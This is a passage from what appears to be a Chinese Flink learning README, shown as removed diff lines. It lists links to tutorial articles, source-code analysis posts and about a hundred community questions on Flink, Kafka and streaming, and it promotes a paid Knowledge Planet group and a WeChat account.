环境并构建运行简单程序入门](http://www.54tianzhisheng.cn/2018/09/18/flink-install) - -3、[Flink 从0到1学习 —— Flink 配置文件详解](http://www.54tianzhisheng.cn/2018/10/27/flink-config/) - -4、[Flink 从0到1学习 —— Data Source 介绍](http://www.54tianzhisheng.cn/2018/10/28/flink-sources/) - -5、[Flink 从0到1学习 —— 如何自定义 Data 
Source ?](http://www.54tianzhisheng.cn/2018/10/30/flink-create-source/) - -6、[Flink 从0到1学习 —— Data Sink 介绍](http://www.54tianzhisheng.cn/2018/10/29/flink-sink/) - -7、[Flink 从0到1学习 —— 如何自定义 Data Sink ?](http://www.54tianzhisheng.cn/2018/10/31/flink-create-sink/) - -8、[Flink 从0到1学习 —— Flink Data transformation(转换)](http://www.54tianzhisheng.cn/2018/11/04/Flink-Data-transformation/) - -9、[Flink 从0到1学习 —— 介绍 Flink 中的 Stream Windows](http://www.54tianzhisheng.cn/2018/12/08/Flink-Stream-Windows/) - -10、[Flink 从0到1学习 —— Flink 中的几种 Time 详解](http://www.54tianzhisheng.cn/2018/12/11/Flink-time/) - -11、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 ElasticSearch](http://www.54tianzhisheng.cn/2018/12/30/Flink-ElasticSearch-Sink/) - -12、[Flink 从0到1学习 —— Flink 项目如何运行?](http://www.54tianzhisheng.cn/2019/01/05/Flink-run/) - -13、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Kafka](http://www.54tianzhisheng.cn/2019/01/06/Flink-Kafka-sink/) - -14、[Flink 从0到1学习 —— Flink JobManager 高可用性配置](http://www.54tianzhisheng.cn/2019/01/13/Flink-JobManager-High-availability/) - -15、[Flink 从0到1学习 —— Flink parallelism 和 Slot 介绍](http://www.54tianzhisheng.cn/2019/01/14/Flink-parallelism-slot/) - -16、[Flink 从0到1学习 —— Flink 读取 Kafka 数据批量写入到 MySQL](http://www.54tianzhisheng.cn/2019/01/15/Flink-MySQL-sink/) - -17、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 RabbitMQ](https://t.zsxq.com/uVbi2nq) - -18、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 HBase](https://t.zsxq.com/zV7MnuJ) - -19、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 HDFS](https://t.zsxq.com/zV7MnuJ) - -20、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Redis](https://t.zsxq.com/zV7MnuJ) - -21、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Cassandra](https://t.zsxq.com/uVbi2nq) - -22、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 Flume](https://t.zsxq.com/zV7MnuJ) - -23、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 InfluxDB](https://t.zsxq.com/zV7MnuJ) - -24、[Flink 从0到1学习 —— Flink 读取 Kafka 数据写入到 RocketMQ](https://t.zsxq.com/zV7MnuJ) - -25、[Flink 从0到1学习 —— 你上传的 jar 包藏到哪里去了](https://t.zsxq.com/uniY7mm) - -26、[Flink 
从0到1学习 —— 你的 Flink job 日志跑到哪里去了](https://t.zsxq.com/zV7MnuJ) - - -### Flink 源码项目结构 - -![](./pics/Flink-code.png) - - -## 学习资料 - -另外我自己整理了些 Flink 的学习资料,目前已经全部放到微信公众号了。 -你可以加我的微信:**yuanblog_tzs**,然后回复关键字:**Flink** 即可无条件获取到,转载请联系本人获取授权,违者必究。 - -![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-09-17-143454.jpg) - -更多私密资料请加入知识星球! - -![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-07-23-124320.jpg) - -有人要问知识星球里面更新什么内容?值得加入吗? - -目前知识星球内已更新的系列文章: - -### 大数据重磅炸弹 - -1、[《大数据重磅炸弹——实时计算引擎 Flink》开篇词](https://t.zsxq.com/fqfuVRR​) - -2、[你公司到底需不需要引入实时计算引擎?](https://t.zsxq.com/emMBaQN​) - -3、[一文让你彻底了解大数据实时计算框架 Flink](https://t.zsxq.com/eM3ZRf2) ​ - -4、[别再傻傻的分不清大数据框架Flink、Blink、Spark Streaming、Structured Streaming和Storm之间的区别了](https://t.zsxq.com/eAyRz7Y)​ - -5、[Flink 环境准备看这一篇就够了](https://t.zsxq.com/iaMJAe6​)   - -6、[一文讲解从 Flink 环境安装到源码编译运行](https://t.zsxq.com/iaMJAe6​) - -7、[通过 WordCount 程序教你快速入门上手 Flink](https://t.zsxq.com/eaIIiAm)  ​ - -8、[Flink 如何处理 Socket 数据及分析实现过程](https://t.zsxq.com/Vnq72jY​)   - -9、[Flink job 如何在 Standalone、YARN、Mesos、K8S 上部署运行?](https://t.zsxq.com/BiyvFUZ​) - -10、[Flink 数据转换必须熟悉的算子(Operator)](https://t.zsxq.com/fufUBiA) - -11、[Flink 中 Processing Time、Event Time、Ingestion Time 对比及其使用场景分析](https://t.zsxq.com/r7aYB2V) - -12、[如何使用 Flink Window 及 Window 基本概念与实现原理](https://t.zsxq.com/byZbyrb) - -13、[如何使用 DataStream API 来处理数据?](https://t.zsxq.com/VzNBi2r) - -14、[Flink WaterMark 详解及结合 WaterMark 处理延迟数据](https://t.zsxq.com/Iub6IQf) - -15、[基于 Apache Flink 的监控告警系统](https://t.zsxq.com/MniUnqb) - -16、[数据仓库、数据库的对比介绍与实时数仓案例分享](https://t.zsxq.com/v7QzNZ3) - -17、[使用 Prometheus Grafana 监控 Flink](https://t.zsxq.com/uRN3VfA) - - -### 源码系列 - -1、[Flink 源码解析 —— 源码编译运行](https://t.zsxq.com/UZfaYfE) - -2、[Flink 源码解析 —— 项目结构一览](https://t.zsxq.com/zZZjaYf) - -3、[Flink 源码解析—— local 模式启动流程](https://t.zsxq.com/zV7MnuJ) - -4、[Flink 源码解析 —— standalonesession 模式启动流程](https://t.zsxq.com/QZVRZJA) - -5、[Flink 源码解析 —— Standalone Session Cluster 启动流程深度分析之 Job Manager 
启动](https://t.zsxq.com/u3fayvf) - -6、[Flink 源码解析 —— Standalone Session Cluster 启动流程深度分析之 Task Manager 启动](https://t.zsxq.com/MnQRByb) - -7、[Flink 源码解析 —— 分析 Batch WordCount 程序的执行过程](https://t.zsxq.com/YJ2Zrfi) - -8、[Flink 源码解析 —— 分析 Streaming WordCount 程序的执行过程](https://t.zsxq.com/qnMFEUJ) - -9、[Flink 源码解析 —— 如何获取 JobGraph?](https://t.zsxq.com/naaMf6y) - -10、[Flink 源码解析 —— 如何获取 StreamGraph?](https://t.zsxq.com/qRFIm6I) - -11、[Flink 源码解析 —— Flink JobManager 有什么作用?](https://t.zsxq.com/2VRrbuf) - -12、[Flink 源码解析 —— Flink TaskManager 有什么作用?](https://t.zsxq.com/RZbu7yN) - -13、[Flink 源码解析 —— JobManager 处理 SubmitJob 的过程](https://t.zsxq.com/zV7MnuJ) - -14、[Flink 源码解析 —— TaskManager 处理 SubmitJob 的过程](https://t.zsxq.com/zV7MnuJ) - -15、[Flink 源码解析 —— 深度解析 Flink Checkpoint 机制](https://t.zsxq.com/ynQNbeM) - -16、[Flink 源码解析 —— 深度解析 Flink 序列化机制](https://t.zsxq.com/JaQfeMf) - -17、[Flink 源码解析 —— 深度解析 Flink 是如何管理好内存的?](https://t.zsxq.com/zjQvjeM) - -18、[Flink Metrics 源码解析 —— Flink-metrics-core](https://t.zsxq.com/Mnm2nI6) - -19、[Flink Metrics 源码解析 —— Flink-metrics-datadog](https://t.zsxq.com/Mnm2nI6) - -20、[Flink Metrics 源码解析 —— Flink-metrics-dropwizard](https://t.zsxq.com/Mnm2nI6) - -21、[Flink Metrics 源码解析 —— Flink-metrics-graphite](https://t.zsxq.com/Mnm2nI6) - -22、[Flink Metrics 源码解析 —— Flink-metrics-influxdb](https://t.zsxq.com/Mnm2nI6) - -23、[Flink Metrics 源码解析 —— Flink-metrics-jmx](https://t.zsxq.com/Mnm2nI6) - -24、[Flink Metrics 源码解析 —— Flink-metrics-slf4j](https://t.zsxq.com/Mnm2nI6) - -25、[Flink Metrics 源码解析 —— Flink-metrics-statsd](https://t.zsxq.com/Mnm2nI6) - -26、[Flink Metrics 源码解析 —— Flink-metrics-prometheus](https://t.zsxq.com/Mnm2nI6) - -![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-07-26-150037.jpg) - -26、[Flink Annotations 源码解析](https://t.zsxq.com/f6eAu3J) - -![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-07-26-145923.jpg) - -除了《从1到100深入学习Flink》源码学习这个系列文章,《从0到1学习Flink》的案例文章也会优先在知识星球更新,让大家先通过一些 demo 学习 Flink,再去深入源码学习! 
- -如果学习 Flink 的过程中,遇到什么问题,可以在里面提问,我会优先解答,这里做个抱歉,自己平时工作也挺忙,微信的问题不能做全部做一些解答, -但肯定会优先回复给知识星球的付费用户的,庆幸的是现在星球里的活跃氛围还是可以的,有不少问题通过提问和解答的方式沉淀了下来。 - -1、[为何我使用 ValueState 保存状态 Job 恢复是状态没恢复?](https://t.zsxq.com/62rZV7q) - -2、[flink中watermark究竟是如何生成的,生成的规则是什么,怎么用来处理乱序数据](https://t.zsxq.com/yF2rjmY) - -3、[消费kafka数据的时候,如果遇到了脏数据,或者是不符合规则的数据等等怎么处理呢?](https://t.zsxq.com/uzFIeiq) - -4、[在Kafka 集群中怎么指定读取/写入数据到指定broker或从指定broker的offset开始消费?](https://t.zsxq.com/Nz7QZBY) - -5、[Flink能通过oozie或者azkaban提交吗?](https://t.zsxq.com/7UVBeMj) - -6、[jobmanager挂掉后,提交的job怎么不经过手动重新提交执行?](https://t.zsxq.com/mUzRbY7) - -7、[使用flink-web-ui提交作业并执行 但是/opt/flink/log目录下没有日志文件 请问关于flink的日志(包括jobmanager、taskmanager、每个job自己的日志默认分别存在哪个目录 )需要怎么配置?](https://t.zsxq.com/Nju7EuV) - -8、[通过flink 仪表盘提交的jar 是存储在哪个目录下?](https://t.zsxq.com/6muRz3j) - -9、[从Kafka消费数据进行etl清洗,把结果写入hdfs映射成hive表,压缩格式、hive直接能够读取flink写出的文件、按照文件大小或者时间滚动生成文件](https://t.zsxq.com/uvFQvFu) - -10、[flink jar包上传至集群上运行,挂掉后,挂掉期间kafka中未被消费的数据,在重新启动程序后,是自动从checkpoint获取挂掉之前的kafka offset位置,自动消费之前的数据进行处理,还是需要某些手动的操作呢?](https://t.zsxq.com/ubIY33f) - -11、[flink 启动时不自动创建 上传jar的路径,能指定一个创建好的目录吗](https://t.zsxq.com/UfA2rBy) - -12、[Flink sink to es 集群上报 slot 不够,单机跑是好的,为什么?](https://t.zsxq.com/zBMnIA6) - -13、[Fllink to elasticsearch如何创建索引文档期时间戳?](https://t.zsxq.com/qrZBAQJ) - -14、[blink有没有api文档或者demo,是否建议blink用于生产环境。](https://t.zsxq.com/J2JiIMv) - -15、[flink的Python api怎样?bug多吗?](https://t.zsxq.com/ZVVrjuv) - -16、[Flink VS Spark Streaming VS Storm VS Kafka Stream ](https://t.zsxq.com/zbybQNf) - -17、[你们做实时大屏的技术架构是什么样子的?flume→kafka→flink→redis,然后后端去redis里面捞数据,酱紫可行吗?](https://t.zsxq.com/Zf6meAm) - -18、[做一个统计指标的时候,需要在Flink的计算过程中多次读写redis,感觉好怪,星主有没有好的方案?](https://t.zsxq.com/YniI2JQ) - -19、[Flink 使用场景大分析,列举了很多的常用场景,可以好好参考一下](https://t.zsxq.com/fYZZfYf) - -20、[将kafka中数据sink到mysql时,metadata的数据为空,导入mysql数据不成功???](https://t.zsxq.com/I6eEqR7) - 
-21、[使用了ValueState来保存中间状态,在运行时中间状态保存正常,但是在手动停止后,再重新运行,发现中间状态值没有了,之前出现的键值是从0开始计数的,这是为什么?是需要实现CheckpointedFunction吗?](https://t.zsxq.com/62rZV7q)
-
-22、[flink on yarn jobmanager的HA需要怎么配置。还是说yarn给管理了](https://t.zsxq.com/mQ7YbQJ)
-
-23、[有两个数据流就行connect,其中一个是实时数据流(kafka 读取),另一个是配置流。由于配置流是从关系型数据库中读取,速度较慢,导致实时数据流流入数据的时候,配置信息还未发送,这样会导致有些实时数据读取不到配置信息。目前采取的措施是在connect方法后的flatmap的实现的在open 方法中,提前加载一次配置信息,感觉这种实现方式不友好,请问还有其他的实现方式吗?](https://t.zsxq.com/q3VvB6U)
-
-24、[Flink能通过oozie或者azkaban提交吗?](https://t.zsxq.com/7UVBeMj)
-
-25、[不采用yarm部署flink,还有其他的方案吗? 主要想解决服务器重启后,flink服务怎么自动拉起? jobmanager挂掉后,提交的job怎么不经过手动重新提交执行?](https://t.zsxq.com/mUzRbY7)
-
-26、[在一个 Job 里将同份数据昨晚清洗操作后,sink 到后端多个地方(看业务需求),如何保持一致性?(一个sink出错,另外的也保证不能插入)](https://t.zsxq.com/bYnimQv)
-
-27、[flink sql任务在某个特定阶段会发生tm和jm丢失心跳,是不是由于gc时间过长呢,](https://t.zsxq.com/YvBAyrV)
-
-28、[有这样一个需求,统计用户近两周进入产品详情页的来源(1首页大搜索,2产品频道搜索,3其他),为php后端提供数据支持,该信息在端上报事件中,php直接获取有点困难。 我现在的解决方案 通过flink滚动窗口(半小时),统计用户半小时内3个来源pv,然后按照日期序列化,直接写mysql。php从数据库中解析出来,再去统计近两周占比。 问题1,这个需求适合用flink去做吗? 问题2,我的方案总感觉怪怪的,有没有好的方案?](https://t.zsxq.com/fayf2Vv)
-
-29、[一个task slot 只能同时运行一个任务还是多个任务呢?如果task slot运行的任务比较大,会出现OOM的情况吗?](https://t.zsxq.com/ZFiY3VZ)
-
-30、[你们怎么对线上flink做监控的,如果整个程序失败了怎么自动重启等等](https://t.zsxq.com/Yn2JqB6)
-
-31、[flink cep规则动态解析有接触吗?有没有成型的框架?](https://t.zsxq.com/YFMFeaA)
-
-32、[每一个Window都有一个watermark吗?window是怎么根据watermark进行触发或者销毁的?](https://t.zsxq.com/VZvRrjm)
-
-33、[ CheckPoint与SavePoint的区别是什么?](https://t.zsxq.com/R3ZZJUF)
-
-34、[flink可以在算子中共享状态吗?或者大佬你有什么方法可以共享状态的呢?](https://t.zsxq.com/Aa62Bim)
-
-35、[运行几分钟就报了,看taskmager日志,报的是 failed elasticsearch bulk request null,可是我代码里面已经做过空值判断了呀 而且也过滤掉了,flink版本1.7.2 es版本6.3.1](https://t.zsxq.com/ayFmmMF)
-
-36、[这种情况,我们调并行度 还是配置参数好](https://t.zsxq.com/Yzzzb2b)
-
-37、[大家都用jdbc写,各种数据库增删查改拼sql有没有觉得很累,ps.set代码一大堆,还要计算每个参数的位置](https://t.zsxq.com/AqBUR3f)
-
-38、[关于datasource的配置,每个taskmanager对应一个datasource?还是每个slot? 
实际运行下来,每个slot中datasorce线程池只要设置1就行了,多了也用不到?](https://t.zsxq.com/AqBUR3f) - -39、[kafka现在每天出现数据丢失,现在小批量数据,一天200W左右, kafka版本为 1.0.0,集群总共7个节点,TOPIC有十六个分区,单条报文1.5k左右](https://t.zsxq.com/AqBUR3f) - -40、[根据key.hash的绝对值 对并发度求模,进行分组,假设10各并发度,实际只有8个分区有处理数据,有2个始终不处理,还有一个分区处理的数据是其他的三倍,如截图](https://t.zsxq.com/AqBUR3f) - -41、[flink每7小时不知道在处理什么, CPU 负载 每7小时,有一次高峰,5分钟内平均负载超过0.8,如截图](https://t.zsxq.com/AqBUR3f) - -42、[有没有Flink写的项目推荐?我想看到用Flink写的整体项目是怎么组织的,不单单是一个单例子](https://t.zsxq.com/M3fIMbu) - -43、[Flink 源码的结构图](https://t.zsxq.com/yv7EQFA) - -44、[我想根据不同业务表(case when)进行不同的redis sink(hash ,set),我要如何操作?](https://t.zsxq.com/vBAYNJq) - -45、[这个需要清理什么数据呀,我把hdfs里面的已经清理了 启动还是报这个](https://t.zsxq.com/b2zbUJa) - -46、[ 在流处理系统,在机器发生故障恢复之后,什么情况消息最多会被处理一次?什么情况消息最少会被处理一次呢?](https://t.zsxq.com/QjQFmQr) - -47、[我检查点都调到5分钟了,这是什么问题](https://t.zsxq.com/zbQNfuJ) - -48、[reduce方法后 那个交易时间 怎么不是最新的,是第一次进入的那个时间,](https://t.zsxq.com/ZrjEauN) - -49、[Flink on Yarn 模式,用yarn session脚本启动的时候,我在后台没有看到到Jobmanager,TaskManager,ApplicationMaster这几个进程,想请问一下这是什么原因呢?因为之前看官网的时候,说Jobmanager就是一个jvm进程,Taskmanage也是一个JVM进程](https://t.zsxq.com/VJyr3bM) - -50、[Flink on Yarn的时候得指定 多少个TaskManager和每个TaskManager slot去运行任务,这样做感觉不太合理,因为用户也不知道需要多少个TaskManager适合,Flink 有动态启动TaskManager的机制吗。](https://t.zsxq.com/VJyr3bM) - -51、[参考这个例子,Flink 零基础实战教程:如何计算实时热门商品 | Jark's Blog, 窗口聚合的时候,用keywindow,用的是timeWindowAll,然后在aggregate的时候用aggregate(new CustomAggregateFunction(), new CustomWindowFunction()),打印结果后,发现窗口中一直使用的重复的数据,统计的结果也不变,去掉CustomWindowFunction()就正常了 ? 非常奇怪](https://t.zsxq.com/UBmUJMv) - -52、[用户进入产品预定页面(端埋点上报),并填写了一些信息(端埋点上报),但半小时内并没有产生任何订单,然后给该类用户发送一个push。 1. 这种需求适合用flink去做吗?2. 
如果适合,说下大概的思路](https://t.zsxq.com/naQb6aI) - -53、[业务场景是实时获取数据存redis,请问我要如何按天、按周、按月分别存入redis里?(比方说过了一天自动换一个位置存redis)](https://t.zsxq.com/AUf2VNz) - -54、[有人 AggregatingState 的例子吗, 感觉官方的例子和 官网的不太一样?](https://t.zsxq.com/UJ6Y7m2) - -55、[flink-jdbc这个jar有吗?怎么没找到啊?1.8.0的没找到,1.6.2的有](https://t.zsxq.com/r3BaAY3) - -56、[现有个关于savepoint的问题,操作流程为,取消任务时设置保存点,更新任务,从保存点启动任务;现在遇到个问题,假设我中间某个算子重写,原先通过state编写,有用定时器,现在更改后,采用窗口,反正就是实现方式完全不一样;从保存点启动就会一直报错,重启,原先的保存点不能还原,此时就会有很多数据重复等各种问题,如何才能保证数据不丢失,不重复等,恢复到停止的时候,现在想到的是记下kafka的偏移量,再做处理,貌似也不是很好弄,有什么解决办法吗](https://t.zsxq.com/jiybIee) - -57、[需要在flink计算app页面访问时长,消费Kafka计算后输出到Kafka。第一条log需要等待第二条log的时间戳计算访问时长。我想问的是,flink是分布式的,那么它能否保证执行的顺序性?后来的数据有没有可能先被执行?](https://t.zsxq.com/eMJmiQz) - -58、[我公司想做实时大屏,现有技术是将业务所需指标实时用spark拉到redis里存着,然后再用一条spark streaming流计算简单乘除运算,指标包含了各月份的比较。请问我该如何用flink简化上述流程?](https://t.zsxq.com/Y7e6aIu) - -59、[flink on yarn 方式,这样理解不知道对不对,yarn-session这个脚本其实就是准备yarn环境的,执行run任务的时候,根据yarn-session初始化的yarnDescription 把 flink 任务的jobGraph提交到yarn上去执行](https://t.zsxq.com/QbIayJ6) - -60、[同样的代码逻辑写在单独的main函数中就可以成功的消费kafka ,写在一个spring boot的程序中,接受外部请求,然后执行相同的逻辑就不能消费kafka。你遇到过吗?能给一些查问题的建议,或者在哪里打个断点,能看到为什么消费不到kafka的消息呢?](https://t.zsxq.com/VFMRbYN) - -61、[请问下flink可以实现一个流中同时存在订单表和订单商品表的数据 两者是一对多的关系 能实现得到 以订单表为主 一个订单多个商品 这种需求嘛](https://t.zsxq.com/QNvjI6Q) - -62、[在用中间状态的时候,如果中间一些信息保存在state中,有没有必要在redis中再保存一份,来做第三方的存储。](https://t.zsxq.com/6ie66EE) - -63、[能否出一期flink state的文章。什么场景下用什么样的state?如,最简单的,实时累加update到state。](https://t.zsxq.com/bm6mYjI) - -64、[flink的双流join博主有使用的经验吗?会有什么常见的问题吗](https://t.zsxq.com/II6AEe2) - -65、[窗口触发的条件问题](https://t.zsxq.com/V7EmUZR) - -66、[flink 定时任务怎么做?有相关的demo么?](https://t.zsxq.com/JY3NJam) - -67、[流式处理过程中数据的一致性如何保证或者如何检测](https://t.zsxq.com/7YZ3Fuz) - -68、[重启flink单机集群,还报job not found 异常。](https://t.zsxq.com/nEEQvzR) - -69、[kafka的数据是用 org.apache.kafka.common.serialization.ByteArraySerialize序列化的,flink这边消费的时候怎么通过FlinkKafkaConsumer创建DataStream?](https://t.zsxq.com/qJyvzNj) - 
-70、[现在公司有一个需求,一些用户的支付日志,通过sls收集,要把这些日志处理后,结果写入到MySQL,关键这些日志可能连着来好几条才是一个用户的,因为发起请求,响应等每个环节都有相应的日志,这几条日志综合处理才能得到最终的结果,请问博主有什么好的方法没有?](https://t.zsxq.com/byvnaEi)
-
-71、[flink 支持hadoop 主备么? hadoop主节点挂了 flink 会切换到hadoop 备用节点?](https://t.zsxq.com/qfie6qR)
-
-72、[请教大家: 实际 flink 开发中用 scala 多还是 java多些? 刚入手 flink 大数据 scala 需要深入学习么?](https://t.zsxq.com/ZVZzZv7)
-
-73、[我使用的是flink是1.7.2最近用了split的方式分流,但是底层的SplitStream上却标注为Deprecated,请问是官方不推荐使用分流的方式吗?](https://t.zsxq.com/Qzbi6yn)
-
-74、[KeyBy 的正确理解,和数据倾斜问题的解释](https://t.zsxq.com/Auf2NVR)
-
-75、[用flink时,遇到个问题 checkpoint大概有2G左右, 有背压时,flink会重启有遇到过这个问题吗](https://t.zsxq.com/3vnIm62)
-
-76、[flink使用yarn-session方式部署,如何保证yarn-session的稳定性,如果yarn-session挂了,需要重新部署一个yarn-session,如何恢复之前yarn-session上的job呢,之前的checkpoint还能使用吗?](https://t.zsxq.com/URzVBIm)
-
-77、[我想请教一下关于sink的问题。我现在的需求是从Kafka消费Json数据,这个Json数据字段可能会增加,然后将拿到的json数据以parquet的格式存入hdfs。现在我可以拿到json数据的schema,但是在保存parquet文件的时候不知道怎么处理。一是flink没有专门的format parquet,二是对于可变字段的Json怎么处理成parquet比较合适?](https://t.zsxq.com/MjyN7Uf)
-
-78、[flink如何在较大的数据量中做去重计算。](https://t.zsxq.com/6qBqVvZ)
-
-79、[flink能在没有数据的时候也定时执行算子吗?](https://t.zsxq.com/Eqjyju7)
-
-80、[使用rocksdb状态后端,自定义pojo怎么实现序列化和反序列化的,有相关demo么?](https://t.zsxq.com/i2zVfIi)
-
-81、[check point 老是失败,是不是自定义的pojo问题?到本地可以,到hdfs就不行,网上也有很多类似的问题 都没有一个很好的解释和解决方案](https://t.zsxq.com/vRJujAi)
-
-82、[cep规则如图,当start事件进入时,时间00:00:15,而后进入end事件,时间00:00:40。我发现规则无法命中。请问within 是从start事件开始计时?还是跟window一样根据系统时间划分的?如果是后者,请问怎么配置才能从start开始计时?](https://t.zsxq.com/MVFmuB6)
-
-83、[Flink聚合结果直接写Mysql的幂等性设计问题](https://t.zsxq.com/EybM3vR)
-
-84、[Flink job打开了checkpoint,用的rocksdb,通过观察hdfs上checkpoint目录,为啥算副本总量会暴增爆减](https://t.zsxq.com/62VzNRF)
-
-85、[Flink 提交任务的 jar包可以指定路径为 HDFS 上的吗]()
-
-86、[在flink web Ui上提交的任务,设置的并行度为2,flink是stand alone部署的。两个任务都正常的运行了几天了,今天有个地方逻辑需要修改,于是将任务cancel掉(在命令行cancel也试了),结果taskmanger挂掉了一个节点。后来用其他任务试了,也同样会导致节点挂掉](https://t.zsxq.com/VfimieI)
-
-87、[一个配置动态更新的问题折腾好久(配置用个静态的map变量存着,有个线程定时去数据库捞数据然后存在这个map里面更新一把),本地 idea 调试没问题,集群部署就一直报 空指针异常。下游的算子使用这个静态变量map去get 
key在集群模式下会出现这个空指针异常,估计就是拿不到 map](https://t.zsxq.com/nee6qRv)
-
-88、[批量写入MySQL,完成HBase批量写入](https://t.zsxq.com/3bEUZfQ)
-
-89、[用flink清洗数据,其中要访问redis,根据redis的结果来决定是否把数据传递到下流,这有可能实现吗?](https://t.zsxq.com/Zb6AM3V)
-
-90、[监控页面流处理的时候这个发送和接收字节为0。](https://t.zsxq.com/RbeYZvb)
-
-91、[sink到MySQL,如果直接用idea的话可以运行,并且成功,大大的代码上面用的FlinkKafkaConsumer010,而我的Flink版本为1.7,kafka版本为2.12,所以当我用FlinkKafkaConsumer010就有问题,于是改为
- FlinkKafkaConsumer就可以直接在idea完成sink到MySQL,但是为何当我把该程序打成Jar包,去运行的时候,就是报FlinkKafkaConsumer找不到呢](https://t.zsxq.com/MN7iuZf)
-
-92、[SocketTextStreamWordCount中输入中文统计不出来,请问这个怎么解决,我猜测应该是需要修改一下代码,应该是这个例子默认统计英文](https://t.zsxq.com/e2VNN7Y)
-
-93、[ Flink 应用程序本地 ide 里面运行的时候并行度是怎么算的?](https://t.zsxq.com/RVRn6AE)
-
-94、[ 请问下flink中对于窗口的全量聚合有apply和process两种 他们有啥区别呢](https://t.zsxq.com/rzbIQBi)
-
-95、[不知道大大熟悉Hbase不,我想直接在Hbase中查询某一列数据,因为有重复数据,所以想使用distinct统计实际数据量,请问Hbase中有没有类似于sql的distinct关键字。如果没有,想实现这种可以不?](https://t.zsxq.com/UJIubub)
-
-96、[ 来分析一下现在Flink,Kafka方面的就业形势,以及准备就业该如何准备的这方面内容呢?](https://t.zsxq.com/VFaQn2j)
-
-97、[ 大佬知道flink的dataStream可以转换为dataSet吗?因为数据需要11分钟一个批次计算出六个指标,并且涉及好几步reduce,计算的指标之间有联系,用Stream卡住了。](https://t.zsxq.com/Zn2FEQZ)
-
-98、[1.如何在同一窗口内实现多次的聚合,比如像spark中的这样2.多个实时流的jion可以用window来处理一批次的数据吗?](https://t.zsxq.com/aIqjmQN)
-
-99、[写的批处理的功能,现在本机跑是没问题的,就是在linux集群上出现了问题,就是不知道如果通过本地调用远程jar包然后传参数和拿到结果参数返回本机](https://t.zsxq.com/ZNvb2FM)
-
-100、[我用standalone开启一个flink集群,上传flink官方用例Socket Window WordCount做测试,开启两个parallelism能正常运行,但是开启4个parallelism后出现错误](https://t.zsxq.com/femmiqf)
-
-101、[ 有使用AssignerWithPunctuatedWatermarks 的案例Demo吗?网上找了都是AssignerWithPeriodicWatermarks的,不知道具体怎么使用?](https://t.zsxq.com/YZ3vbY3)
-
-102、[ 有一个datastream(从文件读取的),然后我用flink sql进行计算,这个sql是一个加总的运算,然后通过retractStreamTableSink可以把文件做sql的结果输出到文件吗?这个输出到文件的接口是用什么呢?](https://t.zsxq.com/uzFyVJe)
-
-103、[ 为啥split这个流设置为过期的](https://t.zsxq.com/6QNNrZz)
-
-104、[ 需要使用flink table的水印机制控制时间的乱序问题,这种场景下我就使用水印+窗口了,我现在写的demo遇到了问题,就是在把触发计算的窗口table(WindowedTable)转换成table进行sql操作时发现窗口中的数据还是乱序的,是不是flink 
table的WindowedTable不支持水印窗口转table-sql的功能](https://t.zsxq.com/Q7YNRBE) - -105、[ Flink 对 SQL 的重视性](https://t.zsxq.com/Jmayrbi) - -106、[ flink job打开了checkpoint,任务跑了几个小时后就出现下面的错,截图是打出来的日志,有个OOM,又遇到过的没?](https://t.zsxq.com/ZrZfa2Z) - -107、[ 本地测试是有数据的,之前该任务放在集群也是有数据的,可能提交过多次,现在读不到数据了 group id 也换过了, 只能重启集群解决么?](https://t.zsxq.com/emaAeyj) - -108、[使用flink清洗数据存到es中,直接在flatmap中对处理出来的数据用es自己的ClientInterface类直接将数据存入es当中,不走sink,这样的处理逻辑是不是会有问题。](https://t.zsxq.com/ayBa6am) - -108、[ flink从kafka拿数据(即增量数据)与存量数据进行内存聚合的需求,现在有一个方案就是程序启动的时候先用flink table将存量数据加载到内存中创建table中,然后将stream的增量数据与table的数据进行关联聚合后输出结束,不知道这种方案可行么。目前个人认为有两个主要问题:1是增量数据stream转化成append table后不知道能与存量的table关联聚合不,2是聚合后输出的结果数据是否过于频繁造成网络传输压力过大](https://t.zsxq.com/QNvbE62) - -109、[ 设置时间时间特性有什么区别呢, 分别在什么场景下使用呢?两种设置时间延迟有什么区别呢 , 分别在什么场景下使用](https://t.zsxq.com/yzjAQ7a) - -110、[ flink从rabbitmq中读取数据,设置了rabbitmq的CorrelationDataId和checkpoint为EXACTLY_ONCE;如果flink完成一次checkpoint后,在这次checkpoint之前消费的数据都会从mq中删除。如果某次flink停机更新,那就会出现mq中的一些数据消费但是处于Unacked状态。在flink又重新开启后这批数据又会重新消费。那这样是不是就不能保证EXACTLY_ONCE了](https://t.zsxq.com/qRrJEaa) - -111、[1. 在Flink checkpoint 中, 像 operator的状态信息 是在设置了checkpoint 之后自动的进行快照吗 ?2. 
How does that relate to manually snapshotting our keyed state (which should be an incremental snapshot)?](https://t.zsxq.com/mAqn2RF)

112. [For real-time product counts and transaction totals, I plan to have Flink read binlog from Kafka for the computation; how should insert and update operations in the binlog be handled so the statistics stay accurate and double counting is avoided?](https://t.zsxq.com/E2BeQ3f)

113. [I use Flink for real-time monitoring — very simple: keyBy each message, a three-minute window, some dedup, and alert on a threshold. The problem is that the same person's alert in the same time window fires twice; the cluster is three machines, standalone cluster, and the preliminary finding is that two of the three operators received the same data](https://t.zsxq.com/vjIeyFI)

114. [With watermarks, the default is to emit one every 200 ms; since each taskmanager sees different data, their maximum watermarks usually differ. At that point, do the taskmanagers broadcast the watermark to obtain a global maximum, or does each use its own? I mainly did not find watermark-broadcast code in the source — did I read carelessly, or is there simply no broadcast of this variable?](https://t.zsxq.com/unq3FIa)

115. [A requirement came up where the job must read Redis periodically from inside; can Flink run scheduled tasks the way an ordinary program does?](https://t.zsxq.com/AeUnAyN)

116. [A trigger event starts an aggregation; once the count is large enough, or on timeout, the result is sunk to MQ. Environment: Flink 1.6, MapState records the trigger event. 1. The count-is-enough case is fine. 2. State TTL is supported in 1.6, but here is the problem: how do I add custom handling at the moment of timeout?](https://t.zsxq.com/z7uZbY3)

117. [Why is the stability of MPP-architecture SQL engines such as Impala relatively poor?](https://t.zsxq.com/R7UjeUF)

